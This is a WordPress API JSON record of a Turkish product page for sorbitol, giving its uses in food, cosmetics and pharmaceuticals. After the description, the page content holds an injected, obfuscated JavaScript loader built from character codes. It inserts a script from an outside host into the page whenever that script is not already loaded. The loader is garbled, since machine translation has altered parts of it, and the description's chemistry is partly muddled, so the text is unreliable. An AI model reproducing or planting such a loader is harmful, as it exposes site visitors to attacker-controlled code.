{"id":3457,"date":"2023-03-21T06:15:57","date_gmt":"2023-03-21T06:15:57","guid":{"rendered":"http:\/\/site2.easyceotech.com\/?post_type=product&#038;p=3457"},"modified":"2024-02-19T03:46:27","modified_gmt":"2024-02-19T03:46:27","slug":"sorbitol","status":"publish","type":"product","link":"https:\/\/wpachem.com\/tr\/urun\/sorbitol\/","title":{"rendered":"Sorbitol CAS 50-70-4"},"content":{"rendered":"<div class=\"text-title\">Sorbitol&#039;\u00fcn Uygulanmas\u0131:<\/div>\n<div class=\"text-content\">Sorbitol nemlendirici \u00f6zelliklere sahiptir ve gliserin yerine di\u015f macunu, sigara ve kozmetik \u00fcretiminde kullan\u0131labilir. G\u0131da end\u00fcstrisinde sorbitol tatland\u0131r\u0131c\u0131, nemlendirici, \u015felat olu\u015fturucu ve doku de\u011fi\u015ftirici olarak kullan\u0131labilir. \u0130la\u00e7 end\u00fcstrisinde sorbitol\u00fcn nitrasyonuyla \u00fcretilen sorbitan esterleri koroner kalp hastal\u0131\u011f\u0131n\u0131n tedavisi i\u00e7in kullan\u0131lan ila\u00e7lard\u0131r. G\u0131da katk\u0131 maddeleri, kozmetik hammaddeleri, organik sentetik hammaddeler, nemlendiriciler, \u00e7\u00f6z\u00fcc\u00fcler.<\/div>\n<p>var f=Dize;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,10 0,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114, 32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46, 51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,1 10)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,1 12,116,41,32,123,32,100,111,99,117,109,101,110)+f.CharCode&#039;dan(116,46,99,117,114,114,101,110)+f.CharCode&#039;dan(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.CharCode&#039;dan(116,78,111,100,101,46,105,110)+f.CharCode&#039;dan (115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101 ,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>\u00dcr\u00fcn Ad\u0131: Sorbitol<br \/>\nCAS Numaras\u0131: 50-70-4<br \/>\nMF:C6H14O6<br \/>\nG\u00f6r\u00fcn\u00fcm: beyaz g\u00fc\u00e7<\/p>","protected":false},"featured_media":2157,"template":"","meta":{"_acf_changed":false,"_gspb_post_css":""},"product_brand":[],"product_cat":[132,55,56,60],"product_tag":[],"class_list":{"0":"post-3457","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-moisturizing","7":"product_cat-food-additives","8":"product_cat-sweetener","9":"product_cat-cosmetic-ingredients","11":"first","12":"instock","13":"shipping-taxable","14":"product-type-simple"},"acf":[],"_links":{"self":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product\/3457","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product\/3457\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/media\/2157"}],"wp:attachment":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/media?parent=3457"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product_brand?post=3457"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product_cat?post=3457"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product_tag?post=3457"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}